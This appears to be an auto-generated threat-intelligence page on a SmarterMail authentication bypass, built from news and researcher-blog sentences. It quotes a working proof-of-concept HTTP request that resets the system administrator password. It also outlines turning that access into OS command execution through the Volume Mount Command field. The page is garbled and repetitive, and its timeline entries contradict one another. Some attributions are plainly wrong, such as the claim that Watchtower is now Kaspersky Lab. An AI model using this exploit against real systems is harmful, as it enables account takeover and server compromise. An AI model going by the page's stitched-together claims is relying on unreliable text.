INSPECTING ARCHIVED INTELLIGENCE (OUTDATED VERSION).

SmarterMail Auth Bypass Exploited in Patch Release

| 2026-01-22 09:46 HIGH HIGH
JSON
Executive Summary AI-generated
The latest incident in the world of cybersecurity reveals a previously undisclosed vulnerability in SmarterMail, an email software developed by SmarterTools. This flaw allows attackers to bypass authentication and execute remote code on vulnerable systems, with the potential for widespread exploitation. The issue was first disclosed just days after a patch release, highlighting the importance of timely updates. As the company notes, users must update their versions as soon as possible to prevent falling victim to this critical security breach.
Technical Mitigations AI-generated
* Implement a more robust authentication mechanism, such as multi-factor authentication or token-based authentication, to prevent attackers from bypassing the security flaw. * Regularly update and patch software components, including SmarterMail, to ensure that known vulnerabilities are addressed before they can be exploited by attackers. * Provide clear documentation and release notes for new features and patches, including explanations of what issues were addressed and how users should use them safely. * Consider implementing a "deny-all-privileges" approach, where administrators have limited privileges but cannot reset passwords or access sensitive data without proper authorization.
Technical Observables
Intelligence Metadata
Actors / Malware / CVEs / Campaigns
CVE-2025-52691CVE-2025-52691 CVE-2026-23760CVE-2026-23760
Target & Sectors
SG
governmentgovernment
Incident Timeline
January 8, 2026
Threat actors exploited a vulnerability in SmarterMail Auth Bypass Exploited in the Wild Two Days After Patch Release by navigating to the Settings page, creating a new volume and supplying an arbitrary command.
organisation SmarterTools
It was patched by SmarterTools on January 15, 2026, with Build 9511 , following responsible disclosure by the exposure management platform on January 8, 2026.
infrastructure Smartermail
It has been described as an authentication bypass flaw that could allow any user to reset the SmarterMail system administrator password by means of a specially crafted HTTP request to the "/api/v1/auth/force-reset-password" endpoint.
The problem is rooted in the function "SmarterMail.Web.
organisation SmarterMail
It has been described as an authentication bypass flaw that could allow any user to reset the SmarterMail system administrator password by means of a specially crafted HTTP request to the "/api/v1/auth/force-reset-password" endpoint.
organisation AuthenticationController
AuthenticationController.ForceResetPassword," which not only allows the endpoint to be reached without authentication, but also leverages the fact that the reset request is accompanied by a boolean flag named "IsSysAdmin" to handle the incoming request depending on whether the user is a system administrator or not.
organisation the Volume Mount Command
This can be accomplished by navigating to the Settings page, creating a new volume , and supplying an arbitrary command in the Volume Mount Command field that gets subsequently executed by the host's operating system.
8th January 2026
Threat actors exploited the SmarterMail Auth Bypass vulnerability in WT-2026.
organisation Detail
Date Detail 8th January 2026 WT-2026-0001 vulnerability discovered and reported to the vendor.
organisation WT-2026
Date Detail 8th January 2026 WT-2026-0001 vulnerability discovered and reported to the vendor.
2026-01-09
Threat actors exploited a vulnerability in SmarterMail Auth, which was patched by the SmarterTool teams within six days of its release on January 15, 2026.
organisation SmarterTool
We believe (and have validated, so it’s not a belief really, but still, sounds nice) that this vulnerability was patched relatively quickly by the SmarterTool teams post reporting, with a patched version released on the January 15, 2026 (release 9511) - 6 days ago.
13th January 2026
Threat actors exploited a previously unknown vulnerability in SmarterMail Auth, which was patched two days after the exploit occurred.
January 15, 2026
SmarterMail's SmarterTools released a patch for CVE-2025-52691 on January 15, 2026.
organisation SmarterTools
It was patched by SmarterTools on January 15, 2026, with Build 9511 , following responsible disclosure by the exposure management platform on January 8, 2026.
organisation The Hacker News
" When reached for comment, SmarterTools told The Hacker News that it released a fix for the vulnerability on January 15, 2026, adding it sent out notifications to all customers, asking them to update to the latest version.
infrastructure Smartermail
" The development comes less than a month after the Cyber Security Agency of Singapore (CSA) disclosed details of a maximum-severity security flaw in SmarterMail (CVE-2025-52691, CVSS score: 10.0) that could be exploited to achieve remote code execution.
The cybersecurity company also said CVE-2025-52691 has come under mass exploitation, making it essential that users of SmarterMail update to the latest version as soon as possible.
"Given the severity of this vulnerability, active exploitation, and exploitation of the additional CVE-2025-52691 being observed in the wild, businesses should prioritize the deployment of SmarterMail updates and review any outdated systems for signs of infection," it added .
"At the time of that release, we did notify all SmarterMail customers that a new version was released that fixed a critical security issue, and we strongly urged them to upgrade," Derek Curtis, chief operating officer at SmarterTools, said.
"As we don't manage installations ourselves – our SmarterMail software is on-premises – we have to rely on customers to read our notifications, then upgrade as soon as they feel it's prudent to do so.
organisation the Cyber Security Agency
" The development comes less than a month after the Cyber Security Agency of Singapore (CSA) disclosed details of a maximum-severity security flaw in SmarterMail (CVE-2025-52691, CVSS score: 10.0) that could be exploited to achieve remote code execution.
organisation CSA
" The development comes less than a month after the Cyber Security Agency of Singapore (CSA) disclosed details of a maximum-severity security flaw in SmarterMail (CVE-2025-52691, CVSS score: 10.0) that could be exploited to achieve remote code execution.
organisation CVSS
" The development comes less than a month after the Cyber Security Agency of Singapore (CSA) disclosed details of a maximum-severity security flaw in SmarterMail (CVE-2025-52691, CVSS score: 10.0) that could be exploited to achieve remote code execution.
organisation CVE-2025-52691
The cybersecurity company also said CVE-2025-52691 has come under mass exploitation, making it essential that users of SmarterMail update to the latest version as soon as possible.
organisation CVE-2026-23760
Update The vulnerability has been assigned the CVE identifier CVE-2026-23760 (CVSS score: 9.3), with Huntress noting that it has observed in-the-wild exploitation of the privileged account takeover vulnerability that could result in remote code execution.
infrastructure 9.3
Update The vulnerability has been assigned the CVE identifier CVE-2026-23760 (CVSS score: 9.3), with Huntress noting that it has observed in-the-wild exploitation of the privileged account takeover vulnerability that could result in remote code execution.
organisation Huntress
Update The vulnerability has been assigned the CVE identifier CVE-2026-23760 (CVSS score: 9.3), with Huntress noting that it has observed in-the-wild exploitation of the privileged account takeover vulnerability that could result in remote code execution.
organisation IP
" Minton also stated that all the IP addresses attempting to exploit CVE-2026-23760 are tied to virtual infrastructure in the U.S., and that the exact origin of the attacks is unknown.
the January 15, 2026
Threat actors exploited a vulnerability in SmarterMail Auth, which was patched by the SmarterTool teams within six days of its release.
organisation SmarterTool
We believe (and have validated, so it’s not a belief really, but still, sounds nice) that this vulnerability was patched relatively quickly by the SmarterTool teams post reporting, with a patched version released on the January 15, 2026 (release 9511) - 6 days ago.
15th January 2026
Threat actors exploited a previously unknown vulnerability in SmarterMail Auth, which was patched two days later.
2026-01-16
Threat actors exploited a vulnerability in SmarterMail Auth, which was patched by the SmarterTool teams within six days of its release.
organisation SmarterTool
We believe (and have validated, so it’s not a belief really, but still, sounds nice) that this vulnerability was patched relatively quickly by the SmarterTool teams post reporting, with a patched version released on the January 15, 2026 (release 9511) - 6 days ago.
January 17, 2026
Threat actors exploited a vulnerability in SmarterMail Auth Bypass to gain unauthorized access within two days of the patch release.
organisation the SmarterTools Community Portal
The cybersecurity company said it chose to make the finding public following a post on the SmarterTools Community Portal, where a user claimed that they lost access to their admin account, with the logs indicating the use of the same "force-reset-password" endpoint to change the password on January 17, 2026, two days after the release of the patch.
infrastructure Smartermail
To make matters worse, it doesn't help that SmarterMail's release notes are vague and do not explicitly mention what issues were addressed.
organisation CVE
" In response, SmarterTools CEO Tim Uzzanti hinted that this is done so to avoid giving threat actors more ammunition, but noted they plan to send an email every time a new CVE is discovered and again when a build has been released to resolve the issue.
17th January 2026
Threat actors exploited a previously unknown vulnerability in SmarterMail Auth, which was patched two days after the discovery.
21th January 2026
Watchtower (now known as Kaspersky Lab) received an anonymous tip about SmarterMail Auth Bypass Exploited in the Wild two days after its patch release.
WT-2026-0001
Threat actors exploited a previously patched SmarterMail authentication bypass vulnerability in the wild two days after its patch release.
infrastructure Smartermail
This same reader was kind enough to point us to a seemingly related SmarterMail forum thread , where a user is claiming that they cannot access their admin account anymore and provided log file excerpts of potentially related and suspicious behaviour: force-reset-password immediately stood out to us - as we’ll show later, this is the exact endpoint implicated in WT-2026-0001.
We decided to continue poking at what looked like a fairly interesting solution and quickly stumbled into WT-2026-0001 - an Authentication Bypass vulnerability, allowing any user to reset the SmarterMail system administrator password.
SmarterMail forum post mentions a successful ITW attempt to exploit WT-2026-0001.
source_region United States
This same reader was kind enough to point us to a seemingly related SmarterMail forum thread , where a user is claiming that they cannot access their admin account anymore and provided log file excerpts of potentially related and suspicious behaviour: force-reset-password immediately stood out to us - as we’ll show later, this is the exact endpoint implicated in WT-2026-0001.
organisation SmarterMail
We decided to continue poking at what looked like a fairly interesting solution and quickly stumbled into WT-2026-0001 - an Authentication Bypass vulnerability, allowing any user to reset the SmarterMail system administrator password.
organisation Authentication Bypass
We decided to continue poking at what looked like a fairly interesting solution and quickly stumbled into WT-2026-0001 - an Authentication Bypass vulnerability, allowing any user to reset the SmarterMail system administrator password.
organisation ITW
SmarterMail forum post mentions a successful ITW attempt to exploit WT-2026-0001.
2026-01-22
The attackers exploited the Authentication Bypass vulnerability in SmarterMail by using it to reset administrator passwords.
organisation WT-2026-0001
Together, friends, we have learned this the hard way today with WT-2026-0001.
infrastructure Smartermail
You may recall that merely two weeks ago, we analyzed CVE-2025-52691 - a pre-auth RCE vulnerability in the SmarterTools SmarterMail email solution with a timeline that is typically reserved for KEV hall-of-famers.
SmarterMail Auth Bypass Exploited in the Wild Two Days After Patch Release.
A new security flaw in SmarterTools SmarterMail email software has come under active exploitation in the wild, two days after the release of a patch.
Wednesdays are meme days - but that changed when an anonymous reader reached out to us with a tip - somebody is currently exploiting SmarterMail and resetting admin passwords.
Attackers With Decompilers Strike Again (SmarterTools SmarterMail WT-2026-0001 Auth Bypass).
As a result, the SmarterMail.Web.Api.
SmarterMail exposes built-in functionality that allows a system administrator to execute operating system commands.
SmarterMail acknowledges the receipt of advisory.
organisation CVE-2025
You may recall that merely two weeks ago, we analyzed CVE-2025-52691 - a pre-auth RCE vulnerability in the SmarterTools SmarterMail email solution with a timeline that is typically reserved for KEV hall-of-famers.
organisation KEV
You may recall that merely two weeks ago, we analyzed CVE-2025-52691 - a pre-auth RCE vulnerability in the SmarterTools SmarterMail email solution with a timeline that is typically reserved for KEV hall-of-famers.
organisation SmarterMail Auth Bypass Exploited
SmarterMail Auth Bypass Exploited in the Wild Two Days After Patch Release.
organisation Patch Release
SmarterMail Auth Bypass Exploited in the Wild Two Days After Patch Release.
organisation AuthenticationController
AuthenticationController.ForceResetPassword method immediately drew our attention:
organisation CVE
At the time of writing, we are unaware of any CVE assigned to this vulnerability.
organisation WT-2026-0001 - Authentication Bypass
Gasp. WT-2026-0001 - Authentication Bypass via Password Reset Bluntly, our plan when we began hunting for the fire behind some smoke was simple - review unauthenticated endpoints, pray for easy wins.
organisation Password Reset Bluntly
Gasp. WT-2026-0001 - Authentication Bypass via Password Reset Bluntly, our plan when we began hunting for the fire behind some smoke was simple - review unauthenticated endpoints, pray for easy wins.
organisation API
At [1] , the force-reset-password API endpoint is defined.
organisation PoC
Nope, no signs of a PoC dropped by a dog with 3 eyes.
organisation TikTok
What about TikTok?
organisation WarThunder
The WarThunder forums, perhaps?
organisation ActionResult
[Description("This function will attempt to reset a user's password and should only be called after a user attempts to login and they receive a ChangePasswordNeeded = true.")] public ActionResult<ResetPasswordResult> ForceResetPassword([FromBody] ForceResetPasswordInputs inputs) { ActionResult<ResetPasswordResult> result; try { ActionResult<ResetPasswordResult> actionResult = base.
organisation ReturnResult
ReturnResult<ResetPasswordResult>(delegate() { AuthenticationService instance = AuthenticationService.Instance; ForceResetPasswordInputs inputs2 = inputs; IPAddress clientIPAddress = this.
organisation AuthenticationService
ReturnResult<ResetPasswordResult>(delegate() { AuthenticationService instance = AuthenticationService.Instance; ForceResetPasswordInputs inputs2 = inputs; IPAddress clientIPAddress = this.
organisation IPAddress
ReturnResult<ResetPasswordResult>(delegate() { AuthenticationService instance = AuthenticationService.Instance; ForceResetPasswordInputs inputs2 = inputs; IPAddress clientIPAddress = this.
organisation HttpContext
HttpContext.
organisation clientIPAddress
ForcePasswordReset(inputs2, (clientIPAddress != null) ?
organisation OldPassword
It has several interesting properties that can be controlled by the user: IsSysAdmin Username OldPassword NewPassword ConfirmPassword That combination is immediately unusual.
organisation NewPassword
It has several interesting properties that can be controlled by the user: IsSysAdmin Username OldPassword NewPassword ConfirmPassword That combination is immediately unusual.
organisation Password
Password reset flows typically rely on a second factor or out-of-band proof of control - for example, a secret token delivered via email.
organisation DebugInfo
DebugInfo = "check1" + Environment.
organisation IsSysAdmin
if (inputs.IsSysAdmin) { ResetPasswordResult resetPasswordResult4 = resetPasswordResult; resetPasswordResult4.DebugInfo = resetPasswordResult4.DebugInfo + "check4.2" + Environment.
organisation SystemRepository
NewLine; db_system_administrator_readonly db_system_administrator_readonly = SystemRepository.
organisation BadRequest
BadRequest; return resetPasswordResult; } PasswordStrength.
organisation PasswordStrength
BadRequest; return resetPasswordResult; } PasswordStrength.
organisation ErrorCode
ErrorCode = requirementCodes.
organisation DateTime
Add(db_system_administrator_readonly.password_hash, DateTime.
organisation UtcNow
UtcNow); db_system_administrator item = new db_system_administrator { guid = db_system_administrator_readonly.guid, Password = inputs.
organisation NewLine
NewLine; try { SystemRepository.
organisation Username
NewLine; } else { ResetPasswordResult resetPasswordResult9 = resetPasswordResult; //... } //... } //... } At [1] , the code takes the Username argument from attacker’s JSON and it retrieves its configuration.
organisation Content-Length
Proof of Concept The PoC is as simple as this: POST /api/v1/auth/force-reset-password HTTP/1.1 Host: xxxxxxx:9998 Content-Type: application/json Content-Length: 145 {"IsSysAdmin":"true", "OldPassword":"watever", "Username":"admin", "NewPassword":"NewPassword123!@#", "ConfirmPassword": "NewPassword123!@#"} You should receive a following response, which confirms that password had been successfully modified: { "username":"", "errorCode":"", "errorData":"", "debugInfo":"check1\\r\\ncheck2\\r\\ncheck3\\r\\ncheck4.2\\r\\ncheck5.2\\r\\ncheck6.2\\r\\ncheck7.2\\r\\ncheck8.2\\r\\n", "success":true, "resultCode":200 } The only remaining requirement is knowing the username of the administrator account.
organisation Volume Mount Command
Supply an arbitrary command in the Volume Mount Command field.
January 27, 2026
SmarterMail Auth Bypass Exploited in the Wild Two Days After Patch Release.
February 16, 2026
Threat actors exploited vulnerabilities in SmarterMail to target the Federal Civilian Executive Branch.
infrastructure Smartermail
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since added both the SmarterMail flaws to its Known Exploited Vulnerabilities ( KEV ) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by February 16, 2026.
attribution Known Exploited
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since added both the SmarterMail flaws to its Known Exploited Vulnerabilities ( KEV ) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by February 16, 2026.
tactic T1588.006 - Vulnerabilities
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since added both the SmarterMail flaws to its Known Exploited Vulnerabilities ( KEV ) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by February 16, 2026.
attribution KEV
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since added both the SmarterMail flaws to its Known Exploited Vulnerabilities ( KEV ) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by February 16, 2026.
attribution Federal Civilian Executive Branch
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since added both the SmarterMail flaws to its Known Exploited Vulnerabilities ( KEV ) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by February 16, 2026.
attribution FCEB
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since added both the SmarterMail flaws to its Known Exploited Vulnerabilities ( KEV ) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by February 16, 2026.
Tactical Metrics
Metrics
infrastructure
​Smartermail
Affected Product
" The development comes less than a month after the Cyber Security Agency of Singapore (CSA) disclosed details of a maximum-severity security flaw in SmarterMail (CVE-2025-52691, CVSS score: 10.0) that could be exploited to achieve remote code execution.
SmarterMail Auth Bypass Exploited in the Wild Two Days After Patch Release.
A new security flaw in SmarterTools SmarterMail email software has come under active exploitation in the wild, two days after the release of a patch.
It has been described as an authentication bypass flaw that could allow any user to reset the SmarterMail system administrator password by means of a specially crafted HTTP request to the "/api/v1/auth/force-reset-password" endpoint.
The problem is rooted in the function "SmarterMail.Web.
To make matters worse, it doesn't help that SmarterMail's release notes are vague and do not explicitly mention what issues were addressed.
"At the time of that release, we did notify all SmarterMail customers that a new version was released that fixed a critical security issue, and we strongly urged them to upgrade," Derek Curtis, chief operating officer at SmarterTools, said.
"As we don't manage installations ourselves – our SmarterMail software is on-premises – we have to rely on customers to read our notifications, then upgrade as soon as they feel it's prudent to do so.
The cybersecurity company also said CVE-2025-52691 has come under mass exploitation, making it essential that users of SmarterMail update to the latest version as soon as possible.
"Given the severity of this vulnerability, active exploitation, and exploitation of the additional CVE-2025-52691 being observed in the wild, businesses should prioritize the deployment of SmarterMail updates and review any outdated systems for signs of infection," it added .
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since added both the SmarterMail flaws to its Known Exploited Vulnerabilities ( KEV ) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by February 16, 2026.
Wednesdays are meme days - but that changed when an anonymous reader reached out to us with a tip - somebody is currently exploiting SmarterMail and resetting admin passwords.
This same reader was kind enough to point us to a seemingly related SmarterMail forum thread , where a user is claiming that they cannot access their admin account anymore and provided log file excerpts of potentially related and suspicious behaviour: force-reset-password immediately stood out to us - as we’ll show later, this is the exact endpoint implicated in WT-2026-0001.
Attackers With Decompilers Strike Again (SmarterTools SmarterMail WT-2026-0001 Auth Bypass).
You may recall that merely two weeks ago, we analyzed CVE-2025-52691 - a pre-auth RCE vulnerability in the SmarterTools SmarterMail email solution with a timeline that is typically reserved for KEV hall-of-famers.
We decided to continue poking at what looked like a fairly interesting solution and quickly stumbled into WT-2026-0001 - an Authentication Bypass vulnerability, allowing any user to reset the SmarterMail system administrator password.
As a result, the SmarterMail.Web.Api.
SmarterMail exposes built-in functionality that allows a system administrator to execute operating system commands.
SmarterMail acknowledges the receipt of advisory.
SmarterMail forum post mentions a successful ITW attempt to exploit WT-2026-0001.
Metrics
infrastructure
​9.3
Software Version
Update The vulnerability has been assigned the CVE identifier CVE-2026-23760 (CVSS score: 9.3), with Huntress noting that it has observed in-the-wild exploitation of the privileged account takeover vulnerability that could result in remote code execution.
Intelligence Sources
The Hacker News 2026-01-22
Zero Day Fans 2026-01-22